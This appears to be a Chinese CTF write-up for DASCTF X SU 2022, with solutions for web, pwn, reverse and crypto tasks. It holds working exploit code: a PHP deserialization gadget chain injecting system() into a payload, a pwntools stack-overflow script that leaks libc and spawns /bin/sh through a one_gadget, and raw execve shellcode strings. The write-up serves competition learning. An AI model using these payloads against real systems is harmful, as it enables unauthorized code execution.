2022DASCTF X SU 三月春季挑战赛
date
Mar 27, 2022
slug
dasctf-2022-3
status
Published
tags
CTF
WriteUP
summary
type
Post
Web
ezpop
到tostring调用
到
最后到call()函数调用get_flag()
$s=new fin();
$s->f1=new what(); //将$s的f1变量作为引用名new一个what类。这里会触发fin()中的__destruct()
$s->f1->a=new fin(); //$s->f1:__destruct()触发__toString()
$s->f1->a->f1=new crow();
$s->f1->a->f1->v1=new fin();//$s->f1->a->f1:__destruct()触发__toString(),__toString()触发__invoke(){因为a是对象所以触发}
$s->f1->a->f1->v1->f1=new mix();//$s->f1->a->f1->v1:__destruct()触发__toString(),__toString()触发__invoke(){因为a是对象所以触发},__invoke()触发__call($a, $b)
$s->f1->a->f1->v1->f1->m1="?><?php system('grep -rni flag');?>";
//var_dump($s);
echo urlencode(serialize($s));Misc
月圆之夜
视频里有字母表,对着写得到flag{welcometothefullmoonnight}
Crypto
Pwn
checkin
题目给了一个read栈溢出,padding 0
xa0,没有给write,
解题思路,利用onegadget,爆破
# _*_ coding:utf-8 _*_
from pwn import *
import os
context(os='linux',arch='amd64', log_level='debug')
#p=process("checkin")
p=remote("node4.buuoj.cn","29937")
def debug(addr,PIE=True):
debug_str = ""
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
for i in addr:
debug_str+='b *{}\n'.format(hex(text_base+i))
gdb.attach(p,debug_str)
else:
for i in addr:
debug_str+='b *{}\n'.format(hex(i))
gdb.attach(p,debug_str)
def dbg():
gdb.attach(p)
#-----------------------------------------------------------------------------------------
s = lambda data :p.send(data) #in case that data is an int
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :p.recv(numb)
ru = lambda delims :p.recvuntil(delims, timeout=0.2)
it = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
bp = lambda bkp :pdbg.bp(bkp)
li = lambda str1,data1 :log.success(str1+'========>'+hex(data1))
def dbgc(addr):
gdb.attach(p,"b*" + hex(addr) +"\n c")
def lg(s):
log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
#0xe3b2e execve("/bin/sh", r15, r12)
#constraints:
# [r15] == NULL || r15 == NULL
# [r12] == NULL || r12 == NULL
# 0xe3b31 execve("/bin/sh", r15, rdx)
# constraints:
# [r15] == NULL || r15 == NULL
# [rdx] == NULL || rdx == NULL
# 0xe3b34 execve("/bin/sh", rsi, rdx)
# constraints:
# [rsi] == NULL || rsi == NULL
# [rdx] == NULL || rdx == NULL
# pop_rdi_ret=0x401253
# pop_r15_ret=0x401252
# addr_plt_start=0x401020
# fuck=[0xe3b2e,0xe3b31,0xe3b34]
pay = b'\x00'*0xa0 + p64(0x4040c0+0xa0) +p64(0x4011BF)
s(pay)
sleep(0.1)
pay = flat([
0x404140,
0x40124A, # pop 6
0,1,
0x404040, # stdout
0,0,
0x404020,
0x401230,
0,0,
0x404140, #rbp
0,0,0,0,
0x4011BF
])
pay = pay.ljust(0xa0,b'\x00') + p64(0x404020+0xa0) +p64(0x4011BF)
s(pay)
sleep(0.1)
s('\x50\x04')
libc_base = u64(ru('\x7f')[-6:].ljust(8,b'\x00')) - 0x1ed6a0
lg("libc_base")
og_addr = libc_base + 0xe3b2e
sleep(0.1)
print("one = "+hex(og_addr))
s(b'a'*0xa0+p64(og_addr)+p64(og_addr))
it()Reverse
easyRe
调试,dump sbox xor完事
v2 = [0] * 42
v2[0] = -61
v2[1] = -128
v2[2] = -43
v2[3] = -14
v2[4] = -101
v2[5] = 48
v2[6] = 11
v2[7] = -76
v2[8] = 85
v2[9] = -34
v2[10] = 34
v2[11] = -125
v2[12] = 47
v2[13] = -105
v2[14] = -72
v2[15] = 32
v2[16] = 29
v2[17] = 116
v2[18] = -47
v2[19] = 1
v2[20] = 115
v2[21] = 26
v2[22] = -78
v2[23] = -56
v2[24] = -59
v2[25] = 116
v2[26] = -64
v2[27] = 91
v2[28] = -9
v2[29] = 15
v2[30] = -45
v2[31] = 1
v2[32] = 85
v2[33] = -78
v2[34] = -92
v2[35] = -82
v2[36] = 123
v2[37] = -84
v2[38] = 92
v2[39] = 86
v2[40] = -68
v2[41] = 35
ARR = [0x00000038, 0x00000078, 0x000000DD, 0x000000E8, 0x00000000, 0x000000AF, 0x000000BF, 0x0000003A, 0x0000006B, 0x000000FB, 0x000000B8, 0x0000000C, 0x00000085, 0x00000035, 0x0000015C, 0x000000AD, 0x000000E6, 0x00000000, 0x000000E0, 0x0000008A, 0x0000001D, 0x000000BD, 0x00000146, 0xFFFFFFD2, 0x0000002B, 0x00000000, 0x00000015, 0x00000024, 0x000000C6, 0x000000AD, 0x000000A1, 0x000000C9, 0x0000007B, 0x00000012, 0x00000028, 0x00000000, 0x00000005, 0x00000000, 0x00000072, 0x0000003E, 0x00000010, 0x000000A1, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x006DFD80, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]
print(bytearray([((v-0x47) ^ ARR[i]) & 0xff for i, v in enumerate(v2)]))login
server 和 client
linux syscall
第一步:过掉token和password check
check1
解password
v6 = [[113, 219, 37, 46, 122, 15],
[76, 163, 106, 34, 170, 41],
[110, 27, 169, 122, 138, 39],
[47, 128, 240, 14, 170, 86],
[247, 89, 88, 0, 169, 242],
[246, 154, 78, 28, 72, 201]
]
v7 = [[163, 151, 162, 85, 83, 190],
[241, 252, 249, 121, 107, 82],
[20, 19, 233, 226, 45, 81],
[142, 31, 86, 8, 87, 39],
[167, 5, 212, 208, 82, 130],
[119, 117, 27, 153, 74, 237]]
v6 = matrix(ZZ,v6)
v7 = matrix(ZZ,v7)
b = v6.solve_right(v7)
pwd = bytearray([])
for i in b:
for j in i:
pwd.append(j % 0x101)
print(pwd.hex())rsa
import gmpy2
from Crypto.Util.number import long_to_bytes, bytes_to_long
p = 98197216341757567488149177586991336976901080454854408243068885480633972200382596026756300968618883148721598031574296054706280190113587145906781375704611841087782526897314537785060868780928063942914187241017272444601926795083433477673935377466676026146695321415853502288291409333200661670651818749836420808033
q = 133639826298015917901017908376475546339925646165363264658181838203059432536492968144231040597990919971381628901127402671873954769629458944972912180415794436700950304720548263026421362847590283353425105178540468631051824814390421486132775876582962969734956410033443729557703719598998956317920674659744121941513
e = 65537
c = int.from_bytes(b'By reading we enrich the mind, by conversation we polish it.', byteorder="big")
n = p * q
phi_n = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi_n)
m = pow(c, d, n)
print(m)解token
#include<iostream>
#include<fstream>
#include<assert.h>
#include<time.h>
#include<gmp.h>
#include<cstdio>
using namespace std;
int main() {
mpz_t data, e, m, n;
char v1[] = "2e7469206873696c6f70206577206e6f697461737265766e6f63207962202c646e696d2065687420686369726e6520657720676e6964616572207942";
char v8[] = "10001";
char inp[] = "11963777321199993924175387978397443935563034091716786597947508874393819454915798980986262132792605021295930274531653741552766395859285325677395421549163602968276475448835066393456449574469736327622969755801884982386140722904578598391534204834007447860153096480268812700725451958035204357033892179559153729604237187552716580637492579876006993181920209114166153317182827927606249871955662032809256743464460825303610341043145126848787575238499023185150429072724679210155061579052743238859739734301162335989939278904459012917375108407803445722785027315562371588439877746983153339473213449448259686486917983129418859935686";
char v9[] = "13123058934861171416713230498081453101147538789122070079961388806126697916963123413431108069961369055630747412550900239402710827847917960870358653962948282381351741121884528399369764530446509936240262290248305226552117100584726616255292963971141510518678552679033220315246377746270515853987903184512948801397452104554589803725619076066339968999308910127885089547678968793196148780382182445270838659078189316664538631875879022325427220682805580410213245364855569367702919157881367085677283124732874621569379901272662162025780608669577546548333274766058755786449491277002349918598971841605936268030140638579388226573929";
mpz_init_set_str(n, v9, 10);
mpz_init_set_str(data, v1, 16);
mpz_init_set_str(e, v8, 16);
mpz_init_set_str(m, inp, 10);
mpz_powm(m, m, e, n);
cout << "powm: " << m << endl;
cout << "data: " << data << endl;
if(mpz_cmp(m, data) == 0){
cout << "success!" << endl;
}
}token
11963777321199993924175387978397443935563034091716786597947508874393819454915798980986262132792605021295930274531653741552766395859285325677395421549163602968276475448835066393456449574469736327622969755801884982386140722904578598391534204834007447860153096480268812700725451958035204357033892179559153729604237187552716580637492579876006993181920209114166153317182827927606249871955662032809256743464460825303610341043145126848787575238499023185150429072724679210155061579052743238859739734301162335989939278904459012917375108407803445722785027315562371588439877746983153339473213449448259686486917983129418859935686password
5132d202c32d95b9f978d514e3294220513b15623482b4c02e9afde8bad5ec07486a5488AES check
modify code
// The SubBytes Function Substitutes the values in the
// state matrix with values in an S-box.
static void SubBytes(state_t* state)
{
uint8_t i, j;
for (i = 0; i < 4; ++i)
{
for (j = 0; j < 4; ++j)
{
// (*state)[j][i] = getSBoxValue((*state)[j][i]);
(*state)[i][j] = getSBoxInvert((*state)[i][j]);
}
}
}
// The SubBytes Function Substitutes the values in the
// state matrix with values in an S-box.
static void InvSubBytes(state_t* state)
{
uint8_t i, j;
for (i = 0; i < 4; ++i)
{
for (j = 0; j < 4; ++j)
{
// (*state)[j][i] = getSBoxInvert((*state)[j][i]);
(*state)[i][j] = getSBoxValue((*state)[i][j]);
}
}
}aes decryption
#include <cstdint>
#include <cstdio>
#include <string>
#include "aes.h"
#define CBC 1
#define AES128 1
int main()
{
uint8_t key[48] = {0x32,0x30,0x07,0x36,0x6a,0x37,0x78,0x31,0x48,0x39,0x42,0x39,0x14,0x31,0xd5,0x32,0x62,0x36,0xf9,0x38,0x42,0x30,0xc3,0x31,0x6a,0x35,0x48,0x38,0x34,0x35,0x54,0x34,0x29,0x34,0x51,0x36,0x15,0x39,0xd2,0x38,0xd2,0x39,0x20,0x31,0xb9,0x32,0x2e,0x30};
uint8_t buf[32+1] = {254, 249, 231, 62, 246, 161, 35, 204, 87, 97, 193, 21, 119, 251, 156, 187, 202, 47, 177, 232, 79, 217, 7, 216, 12, 107, 234, 207, 232, 66, 162, 250};
struct AES_ctx ctx2{};
AES_init_ctx_iv(&ctx2, key, key+16);
AES_CBC_decrypt_buffer(&ctx2, buf, 16);
AES_init_ctx_iv(&ctx2, key, key+32);
AES_CBC_decrypt_buffer(&ctx2, buf+16, 16);
for (int i = 0; i < 32; ++i) {
printf("%02x ", buf[i]);
}
printf("\n");
printf("decrypt : %s\n", (char *)buf);
return 0;
}get the flag
